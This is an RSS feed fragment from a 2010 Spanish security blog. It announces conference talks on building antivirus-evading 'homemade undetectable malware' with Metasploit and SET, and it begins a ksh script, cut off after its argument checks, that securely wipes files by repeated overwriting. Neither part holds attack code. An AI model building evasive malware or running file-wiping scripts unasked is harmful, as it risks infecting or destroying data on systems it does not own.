href="http://www.addtoany.com/add_to/blogger_post?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F11%2F23%2Freunion-cum-2010%2F&amp;linkname=Reuni%C3%B3n%20CUM%202010" title="Blogger Post" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/blogger.png" width="16" height="16" alt="Blogger Post"/></a><a class="a2a_button_yahoo_bookmarks" href="http://www.addtoany.com/add_to/yahoo_bookmarks?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F11%2F23%2Freunion-cum-2010%2F&amp;linkname=Reuni%C3%B3n%20CUM%202010" title="Yahoo Bookmarks" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/yahoo.png" width="16" height="16" alt="Yahoo Bookmarks"/></a><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F11%2F23%2Freunion-cum-2010%2F&amp;title=Reuni%C3%B3n%20CUM%202010" id="wpa2a_4"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/share_save_120_16.png" width="120" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://hackarandas.com/blog/2010/11/23/reunion-cum-2010/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Conferencia HUM &#8211; BugCon2010</title>
		<link>http://hackarandas.com/blog/2010/10/28/conferencia-hum-bugcon2010/</link>
		<comments>http://hackarandas.com/blog/2010/10/28/conferencia-hum-bugcon2010/#comments</comments>
		<pubDate>Thu, 28 Oct 2010 05:06:31 +0000</pubDate>
		<dc:creator>Ch0ks</dc:creator>
				<category><![CDATA[Conferencias]]></category>
		<category><![CDATA[Eventos]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Presentaciones]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Adrian Puente Z.]]></category>
		<category><![CDATA[bugcon]]></category>
		<category><![CDATA[BugCon20101]]></category>
		<category><![CDATA[hackarandas]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[seguridad informatica]]></category>

		<guid isPermaLink="false">http://hackarandas.com/blog/?p=355</guid>
		<description><![CDATA[Quiero invitarlos a mi conferencia de HUM &#8211; Homemade Undetectable Malware que voy a dar en la BugCon2010 este viernes 29 de octubre del 2010. Es parte de lo que dí en la conferencia del ITESM pero voy a agregarle mas contenido y espero ahora si me salgan los demos. Jojojo. No dejen de ir, [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://hackarandas.com/blog/wp-content/uploads/2010/10/bugcon20101.gif" alt="" title="BugCon2010" width="84" height="100" class="alignleft size-full wp-image-357" style="margin: 10px 10px 0pt 0pt; float: left;"/> Quiero invitarlos a mi conferencia de HUM &#8211; Homemade Undetectable Malware que voy a dar en la <a href="http://www.bugcon.org">BugCon2010</a> este viernes 29 de octubre del 2010. Es parte de lo que dí en la <a href="http://hackarandas.com/blog/2010/08/27/conferencia-hum-homemade-undetectable-malware/">conferencia del ITESM </a>pero voy a agregarle mas contenido y espero ahora si me salgan los demos. Jojojo.</p>
<p>No dejen de ir, hoy inició el congreso pero promete mucho y siempre es padre conocer gente del underground y profesionales de la seguridad informática. Un agradecimiento a <a href="http://www.belindofan.com.ar">Vendetta</a> por facilitar el día de la conferencia y allá nos vemos.</p>
<p>Cómo llegar:</p>
<blockquote><p>Centro Formación e Innovación Educativa (CFIE): Av. Wilfrido Massieu sin número esquina con  Luis Enrique Erro Unidad Profesional “Adolfo López Mateos”, Zacatenco.</p>
<p>La forma más fácil de llegar desde el sur es tomar todo Insurgentes hacia el norte y salir en Av. Montevideo, en Montevideo llegar hasta el cruce con Av. Instituto Politécnico Nacional, seguir por Av. Politécnico y a una calle empieza Wilfrido Massieu allí lo reconoceran por que empiezan las rejas guindas del IPN. Seguir por Wilfrideo Massieu, lo más característico es el planetario que se distingue por ser esférico del techo, el edificio al lado es el CFIE, lo reconoceran por una pirámide de cristal que tiene en el techo en el frente hay una mantonta azul con la catarina.</p>
<p>Si es en transporte público lo más fácil es llegar a Metro Lindavista o Metro Politécnico, de Metro Lindavista pueden tomar un taxi deben ser como $10, de Metro Politécnico tendrían que caminar como 10 min por que la avenida es en sentido contrario.</p></blockquote>
<p>El mapísima obligatorio.<br />
<center><br />
<iframe width="300" height="300" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="http://maps.google.com/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;msid=100455971729034726992.000493a629a247a353355&amp;ll=19.496481,-99.14011&amp;spn=0.003034,0.003219&amp;z=17&amp;output=embed"></iframe><br /><small>View <a href="http://maps.google.com/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;msid=100455971729034726992.000493a629a247a353355&amp;ll=19.496481,-99.14011&amp;spn=0.003034,0.003219&amp;z=17&amp;source=embed" style="color:#0000FF;text-align:left">BugCon2010</a> in a larger map</small></center></p>
<p><em>Adrián Puente Z.</em></p>
<p>Technorati Tags: <a href=http://technorati.com/tag/BugCon2010 rel=tag>BugCon2010</a> <a href=http://technorati.com/tag/hackarandas rel=tag>hackarandas</a> <a href=http://technorati.com/tag/Adrian+Puente+Z. rel=tag>Adrian Puente Z.</a> <a href=http://technorati.com/tag/HUM rel=tag>HUM</a> <a href=http://technorati.com/tag/Homemade+Undetectable+Malware rel=tag>Homemade Undetectable Malware</a> <a href=http://technorati.com/tag/conferencia rel=tag>conferencia</a> </p>
<p><a class="a2a_button_slashdot" href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F10%2F28%2Fconferencia-hum-bugcon2010%2F&amp;linkname=Conferencia%20HUM%20%E2%80%93%20BugCon2010" title="Slashdot" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a><a class="a2a_button_tumblr" href="http://www.addtoany.com/add_to/tumblr?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F10%2F28%2Fconferencia-hum-bugcon2010%2F&amp;linkname=Conferencia%20HUM%20%E2%80%93%20BugCon2010" title="Tumblr" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/tumblr.png" width="16" height="16" alt="Tumblr"/></a><a class="a2a_button_wordpress" href="http://www.addtoany.com/add_to/wordpress?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F10%2F28%2Fconferencia-hum-bugcon2010%2F&amp;linkname=Conferencia%20HUM%20%E2%80%93%20BugCon2010" title="WordPress" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/wordpress.png" width="16" height="16" alt="WordPress"/></a><a class="a2a_button_twitter" href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F10%2F28%2Fconferencia-hum-bugcon2010%2F&amp;linkname=Conferencia%20HUM%20%E2%80%93%20BugCon2010" title="Twitter" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a><a class="a2a_button_linkedin" href="http://www.addtoany.com/add_to/linkedin?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F10%2F28%2Fconferencia-hum-bugcon2010%2F&amp;linkname=Conferencia%20HUM%20%E2%80%93%20BugCon2010" title="LinkedIn" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/linkedin.png" width="16" height="16" alt="LinkedIn"/></a><a class="a2a_button_google_bookmarks" href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F10%2F28%2Fconferencia-hum-bugcon2010%2F&amp;linkname=Conferencia%20HUM%20%E2%80%93%20BugCon2010" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a><a class="a2a_button_facebook" href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F10%2F28%2Fconferencia-hum-bugcon2010%2F&amp;linkname=Conferencia%20HUM%20%E2%80%93%20BugCon2010" title="Facebook" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a><a class="a2a_button_google_reader" href="http://www.addtoany.com/add_to/google_reader?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F10%2F28%2Fconferencia-hum-bugcon2010%2F&amp;linkname=Conferencia%20HUM%20%E2%80%93%20BugCon2010" title="Google Reader" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/reader.png" width="16" height="16" alt="Google Reader"/></a><a class="a2a_button_digg" href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F10%2F28%2Fconferencia-hum-bugcon2010%2F&amp;linkname=Conferencia%20HUM%20%E2%80%93%20BugCon2010" title="Digg" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a><a class="a2a_button_meneame" href="http://www.addtoany.com/add_to/meneame?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F10%2F28%2Fconferencia-hum-bugcon2010%2F&amp;linkname=Conferencia%20HUM%20%E2%80%93%20BugCon2010" title="Meneame" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/meneame.png" width="16" height="16" alt="Meneame"/></a><a class="a2a_button_technorati_favorites" href="http://www.addtoany.com/add_to/technorati_favorites?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F10%2F28%2Fconferencia-hum-bugcon2010%2F&amp;linkname=Conferencia%20HUM%20%E2%80%93%20BugCon2010" title="Technorati Favorites" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/technorati.png" width="16" height="16" alt="Technorati Favorites"/></a><a class="a2a_button_stumbleupon" href="http://www.addtoany.com/add_to/stumbleupon?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F10%2F28%2Fconferencia-hum-bugcon2010%2F&amp;linkname=Conferencia%20HUM%20%E2%80%93%20BugCon2010" title="StumbleUpon" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/stumbleupon.png" width="16" height="16" alt="StumbleUpon"/></a><a class="a2a_button_blogger_post" href="http://www.addtoany.com/add_to/blogger_post?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F10%2F28%2Fconferencia-hum-bugcon2010%2F&amp;linkname=Conferencia%20HUM%20%E2%80%93%20BugCon2010" title="Blogger Post" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/blogger.png" width="16" height="16" alt="Blogger Post"/></a><a class="a2a_button_yahoo_bookmarks" href="http://www.addtoany.com/add_to/yahoo_bookmarks?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F10%2F28%2Fconferencia-hum-bugcon2010%2F&amp;linkname=Conferencia%20HUM%20%E2%80%93%20BugCon2010" title="Yahoo Bookmarks" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/yahoo.png" width="16" height="16" alt="Yahoo Bookmarks"/></a><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F10%2F28%2Fconferencia-hum-bugcon2010%2F&amp;title=Conferencia%20HUM%20%E2%80%93%20BugCon2010" id="wpa2a_6"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/share_save_120_16.png" width="120" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://hackarandas.com/blog/2010/10/28/conferencia-hum-bugcon2010/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Conferencia: HUM &#8211; Homemade Undetectable Malware</title>
		<link>http://hackarandas.com/blog/2010/08/27/conferencia-hum-homemade-undetectable-malware/</link>
		<comments>http://hackarandas.com/blog/2010/08/27/conferencia-hum-homemade-undetectable-malware/#comments</comments>
		<pubDate>Fri, 27 Aug 2010 05:10:53 +0000</pubDate>
		<dc:creator>Ch0ks</dc:creator>
				<category><![CDATA[Eventos]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Presentaciones]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Adrian Puente Z.]]></category>
		<category><![CDATA[arturo garcia]]></category>
		<category><![CDATA[elprofeseguro]]></category>
		<category><![CDATA[hackarandas]]></category>
		<category><![CDATA[indetectable]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[seguridad informatica]]></category>
		<category><![CDATA[SET]]></category>
		<category><![CDATA[undetectable]]></category>

		<guid isPermaLink="false">http://hackarandas.com/blog/?p=318</guid>
		<description><![CDATA[Tengo el gusto de anunciarles que el Profesor Arturo García conocido en el Twitter cómo @ElProfeSeguro, me ha invitado a dar una conferencia sobre HUM o Homemade Undetectable Malware en el ITESM CCM. No quiero adelantar mucho de la conferencia pero platicaré de mi experiencia creando malware indetectable cómo estos se propagan y describiré las [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://hackarandas.com/blog/wp-content/uploads/2010/08/Malware-150x150.png" alt="HUM - Homemade Undetectable Malware" title="HUM" width="150" height="150" class="alignleft size-thumbnail wp-image-329" style="margin: 10px 10px 0pt 0pt; float: left;" /> Tengo el gusto de anunciarles que el Profesor <a href="http://mx.linkedin.com/in/agarciah">Arturo García</a> conocido en el Twitter cómo <a href="http://twitter.com/elprofeseguro">@ElProfeSeguro</a>, me ha invitado a dar una conferencia sobre HUM o Homemade Undetectable <a href="http://en.wikipedia.org/wiki/Malware">Malware</a> en el <a href="http://www.ccm.itesm.mx/">ITESM CCM</a>.</p>
<p>No quiero adelantar mucho de la conferencia pero platicaré de mi experiencia creando malware indetectable cómo estos se propagan y describiré las herramientas que utlilizo cómo el <a href="http://www.metasploit.com/">Metasploit</a> y el <a href="http://www.offensive-security.com/metasploit-unleashed/Social-Engineering-Toolkit">Social Engineer Toolkit</a> en las pruebas de penetración que realizo y cómo las combino con el Malware para mayor efectividad.</p>
<li>Fecha: Martes 31 de agosto de 2010</li>
<li>Hora: 19:00 hrs</li>
<li>Duración: 90 minutos</li>
<li>Lugar: ITESM CCM, Aula Magna 1. Primer piso. Aulas II.</li>
<li>Entrada libre y gratuita.</li>
<p>Cómo llegar:<br />
<center><a href="http://www.ccm.itesm.mx/nuestrocampus/llegar.html"><img src="http://hackarandas.com/blog/wp-content/uploads/2010/08/mapa.itesm_.ccm_-300x163.jpg" alt="Como llegar al ITESM CCM" title="Como llegar al ITESM CCM" width="300" height="163" class="size-medium wp-image-323" /></a></center></p>
<p>Espero verlos por ahi y un agradecimiento a Arturo García y al ITESM CCM por la invitación y las facilidades para dar la conferencia.</p>
<p><strong>ACTUALIZACION</strong></p>
<p>Disfruté mucho dar la conferencia y un grupo muy participativo, realmente la pasé bien y tuve el gusto de conocer a <a href="http://twitter.com/Paco_">@Paco_</a> dueño del interesante blog  <a href="http://www.hacking.mx/">Hacking MX</a>. Gracias a todos los que fueron y a quieren me invitaron y la presentación se las dejo en la <a href="http://hackarandas.com/blog/security-articles/">sección de artículos</a>dentro de mi blog o lo pueden descargar de la siguiente liga:</p>
<p><center><a href="http://hackarandas.com/security-articles/Conferencia.HUM-Adrian.Puente.Z.pdf"><img src="http://hackarandas.com/blog/wp-content/uploads/2009/04/pdf.miniatura.png" alt="Descarga la presentación" title="Descarga la presentación" width="50" height="50" border=0 class="aligncenter size-thumbnail wp-image-341" /><br /> HUM: Homemade Undetectable Malware</a></p>
<p><a href="http://hackarandas.com/blog/wp-content/uploads/2010/08/sta43589.jpg"><img src="http://hackarandas.com/blog/wp-content/uploads/2010/08/sta43589-150x150.jpg" alt="" title="Conferencia HUM - ITESM 2010" width="50" height="50" class="alignleft size-thumbnail wp-image-347" /></a><a href="http://hackarandas.com/blog/wp-content/uploads/2010/08/sta43592.jpg"><img src="http://hackarandas.com/blog/wp-content/uploads/2010/08/sta43592-150x150.jpg" alt="" title="Conferencia HUM - ITESM 2010" width="50" height="50" class="alignleft size-thumbnail wp-image-349" /></a> <a href="http://hackarandas.com/blog/wp-content/uploads/2010/08/sta43595.jpg"><img src="http://hackarandas.com/blog/wp-content/uploads/2010/08/sta43595-150x150.jpg" alt="" title="Conferencia HUM - ITESM 2010" width="50" height="50" class="alignleft size-thumbnail wp-image-350" /></p>
<p></center></p>
<p><em>Adrián Puente Z.</em></p>
<p>Technorati Tags: <a title="Adrian Puente Z." href="http://technorati.com/tag/Adrian+Puente+Z." rel="tag" target="_blank">Adrian Puente Z.</a>, <a title="itesm ccm" href="http://technorati.com/tag/itesm+ccm" rel="tag" target="_blank">itesm ccm</a>, <a title="hackarandas" href="http://technorati.com/tag/hackarandas" rel="tag" target="_blank">hackarandas</a>, <a title="malware" href="http://technorati.com/tag/malware" rel="tag" target="_blank">malware</a>, <a title="SET" href="http://technorati.com/tag/SET" rel="tag" target="_blank">SET</a>, <a title="metasploit" href="http://technorati.com/tag/metasploit" rel="tag" target="_blank">metasploit</a>, <a title="antivirus" href="http://technorati.com/tag/antivirus" rel="tag" target="_blank">antivirus</a>, <a title="undetectable" href="http://technorati.com/tag/undetectable" rel="tag" target="_blank">undetectable</a>, <a title="Arturo Garcia" href="http://technorati.com/tag/Arturo+Garcia" rel="tag" target="_blank">arturo garcia</a>, <a title="elprofeseguro" href="http://technorati.com/tag/elprofeseguro" rel="tag" target="_blank">elprofeseguro</a></p>
<p><a class="a2a_button_slashdot" href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F27%2Fconferencia-hum-homemade-undetectable-malware%2F&amp;linkname=Conferencia%3A%20HUM%20%E2%80%93%20Homemade%20Undetectable%20Malware" title="Slashdot" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a><a class="a2a_button_tumblr" href="http://www.addtoany.com/add_to/tumblr?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F27%2Fconferencia-hum-homemade-undetectable-malware%2F&amp;linkname=Conferencia%3A%20HUM%20%E2%80%93%20Homemade%20Undetectable%20Malware" title="Tumblr" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/tumblr.png" width="16" height="16" alt="Tumblr"/></a><a class="a2a_button_wordpress" href="http://www.addtoany.com/add_to/wordpress?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F27%2Fconferencia-hum-homemade-undetectable-malware%2F&amp;linkname=Conferencia%3A%20HUM%20%E2%80%93%20Homemade%20Undetectable%20Malware" title="WordPress" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/wordpress.png" width="16" height="16" alt="WordPress"/></a><a class="a2a_button_twitter" href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F27%2Fconferencia-hum-homemade-undetectable-malware%2F&amp;linkname=Conferencia%3A%20HUM%20%E2%80%93%20Homemade%20Undetectable%20Malware" title="Twitter" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a><a class="a2a_button_linkedin" href="http://www.addtoany.com/add_to/linkedin?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F27%2Fconferencia-hum-homemade-undetectable-malware%2F&amp;linkname=Conferencia%3A%20HUM%20%E2%80%93%20Homemade%20Undetectable%20Malware" title="LinkedIn" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/linkedin.png" width="16" height="16" alt="LinkedIn"/></a><a class="a2a_button_google_bookmarks" href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F27%2Fconferencia-hum-homemade-undetectable-malware%2F&amp;linkname=Conferencia%3A%20HUM%20%E2%80%93%20Homemade%20Undetectable%20Malware" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a><a class="a2a_button_facebook" href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F27%2Fconferencia-hum-homemade-undetectable-malware%2F&amp;linkname=Conferencia%3A%20HUM%20%E2%80%93%20Homemade%20Undetectable%20Malware" title="Facebook" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a><a class="a2a_button_google_reader" href="http://www.addtoany.com/add_to/google_reader?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F27%2Fconferencia-hum-homemade-undetectable-malware%2F&amp;linkname=Conferencia%3A%20HUM%20%E2%80%93%20Homemade%20Undetectable%20Malware" title="Google Reader" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/reader.png" width="16" height="16" alt="Google Reader"/></a><a class="a2a_button_digg" href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F27%2Fconferencia-hum-homemade-undetectable-malware%2F&amp;linkname=Conferencia%3A%20HUM%20%E2%80%93%20Homemade%20Undetectable%20Malware" title="Digg" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a><a class="a2a_button_meneame" href="http://www.addtoany.com/add_to/meneame?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F27%2Fconferencia-hum-homemade-undetectable-malware%2F&amp;linkname=Conferencia%3A%20HUM%20%E2%80%93%20Homemade%20Undetectable%20Malware" title="Meneame" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/meneame.png" width="16" height="16" alt="Meneame"/></a><a class="a2a_button_technorati_favorites" href="http://www.addtoany.com/add_to/technorati_favorites?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F27%2Fconferencia-hum-homemade-undetectable-malware%2F&amp;linkname=Conferencia%3A%20HUM%20%E2%80%93%20Homemade%20Undetectable%20Malware" title="Technorati Favorites" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/technorati.png" width="16" height="16" alt="Technorati Favorites"/></a><a class="a2a_button_stumbleupon" href="http://www.addtoany.com/add_to/stumbleupon?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F27%2Fconferencia-hum-homemade-undetectable-malware%2F&amp;linkname=Conferencia%3A%20HUM%20%E2%80%93%20Homemade%20Undetectable%20Malware" title="StumbleUpon" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/stumbleupon.png" width="16" height="16" alt="StumbleUpon"/></a><a class="a2a_button_blogger_post" href="http://www.addtoany.com/add_to/blogger_post?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F27%2Fconferencia-hum-homemade-undetectable-malware%2F&amp;linkname=Conferencia%3A%20HUM%20%E2%80%93%20Homemade%20Undetectable%20Malware" title="Blogger Post" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/blogger.png" width="16" height="16" alt="Blogger Post"/></a><a class="a2a_button_yahoo_bookmarks" href="http://www.addtoany.com/add_to/yahoo_bookmarks?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F27%2Fconferencia-hum-homemade-undetectable-malware%2F&amp;linkname=Conferencia%3A%20HUM%20%E2%80%93%20Homemade%20Undetectable%20Malware" title="Yahoo Bookmarks" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/yahoo.png" width="16" height="16" alt="Yahoo Bookmarks"/></a><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F27%2Fconferencia-hum-homemade-undetectable-malware%2F&amp;title=Conferencia%3A%20HUM%20%E2%80%93%20Homemade%20Undetectable%20Malware" id="wpa2a_8"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/share_save_120_16.png" width="120" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://hackarandas.com/blog/2010/08/27/conferencia-hum-homemade-undetectable-malware/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Uncomplicated File Wipe for *NIX</title>
		<link>http://hackarandas.com/blog/2010/08/17/uncomplicated-wipe-for-nix/</link>
		<comments>http://hackarandas.com/blog/2010/08/17/uncomplicated-wipe-for-nix/#comments</comments>
		<pubDate>Wed, 18 Aug 2010 01:59:02 +0000</pubDate>
		<dc:creator>Ch0ks</dc:creator>
				<category><![CDATA[c0de]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Adrian Puente Z.]]></category>
		<category><![CDATA[hackarandas]]></category>
		<category><![CDATA[ksh]]></category>
		<category><![CDATA[secure delete]]></category>
		<category><![CDATA[seguridad informatica]]></category>
		<category><![CDATA[unix]]></category>
		<category><![CDATA[wipe]]></category>

		<guid isPermaLink="false">http://hackarandas.com/blog/?p=285</guid>
		<description><![CDATA[We needed to guarantee to one of our customers that a file will be securely deleted. Since the server was a HPUX Unix and we can&#8217;t compile nor install new applications, I managed to write this script to wipe the file. The file is overwritten 7 times as the US Department of Defense clearing standard [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://hackarandas.com/blog/wp-content/uploads/2010/08/file-shredding_medium.jpeg" alt="" title="File Shredding" width="193" height="240" class="alignleft size-full wp-image-291" style="margin: 10px 10px 0pt 0pt; float: left;" /> We needed to guarantee to one of our customers that a file will be securely deleted. Since the server was a HPUX Unix and we can&#8217;t compile nor install new applications, I managed to write this script to wipe the file.</p>
<p>The file is overwritten 7 times as the <a href="http://www.usaid.gov/policy/ads/500/d522022m.pdf">US Department of Defense clearing standard DoD 5220.22-M</a> specifies and renamed another 7 times before being deleted. It is written for the KSH shell as many UNIX has it by default. It doesn&#8217;t  run in bash but you can edit it to fit your needs.</p>
<p>Here is the code:</p>
<div class="dean_ch" style="white-space: wrap;">
<span class="re3">#!/usr/bin/ksh</span><br />
<span class="re3"># Script by Adrian Puente Z..</span><br />
<span class="re3"># Powered by Hackarandas www.hackarandas.com</span><br />
<span class="re3"># Licensed by GNU GPLv3</span><br />
<span class="re3"># http://www.gnu.org/licenses/gpl<span class="nu0">-3.0</span>.txt</span></p>
<p><span class="re3"># US Department of Defense clearing standard DOD <span class="nu0">5220.22</span>-M <span class="br0">&#40;</span>ECE<span class="br0">&#41;</span></span><br />
<span class="re2">PASES=</span><span class="nu0">7</span><br />
<span class="re3"># Device to overwrite the <span class="kw2">file</span>.</span><br />
<span class="re3"># Can be:</span><br />
<span class="re3"># /dev/random</span><br />
<span class="re3"># /dev/urandom</span><br />
<span class="re3"># /dev/zero <span class="br0">&#40;</span><span class="kw2">less</span> secure, overwritten with zeros<span class="br0">&#41;</span></span><br />
<span class="re2">RANDEV=</span>/dev/urandom<br />
<span class="re2">NAME=</span>$$<br />
<span class="re2">COUNT=</span><span class="nu0">0</span><br />
<span class="re2">FILE=</span>$<span class="nu0">1</span></p>
<p><span class="kw1">if</span> <span class="br0">&#91;</span><span class="br0">&#91;</span> <span class="re4">$#</span> -eq <span class="nu0">0</span> <span class="br0">&#93;</span><span class="br0">&#93;</span>;then<br />
&nbsp; &nbsp; print <span class="st0">&quot;Syntax: $0 &lt;file to wipe&gt;&quot;</span><br />
&nbsp; &nbsp; <span class="kw3">exit</span> <span class="nu0">1</span><br />
<span class="kw1">fi</span></p>
<p><span class="kw1">if</span> <span class="br0">&#91;</span><span class="br0">&#91;</span> ! -f <span class="re1">$FILE</span> <span class="br0">&#93;</span><span class="br0">&#93;</span><br />
<span class="kw1">then</span><br />
&nbsp; &nbsp; print <span class="st0">&quot;File $FILE doesn&#8217;t exists&quot;</span><br />
&nbsp; &nbsp; <span class="kw3">exit</span> <span class="nu0">1</span><br />
<span class="kw1">fi</span></p>
<p><span class="kw1">if</span> <span class="br0">&#91;</span><span class="br0">&#91;</span> ! -<span class="kw2">w</span> <span class="re1">$FILE</span> <span class="br0">&#93;</span><span class="br0">&#93;</span><br />
<span class="kw1">then</span><br />
&nbsp; &nbsp; print <span class="st0">&quot;Can&#8217;t write on file $FILE&quot;</span><br />
&nbsp; &nbsp; <span class="kw3">exit</span> <span class="nu0">1</span><br />
<span class="kw1">fi</span></p>
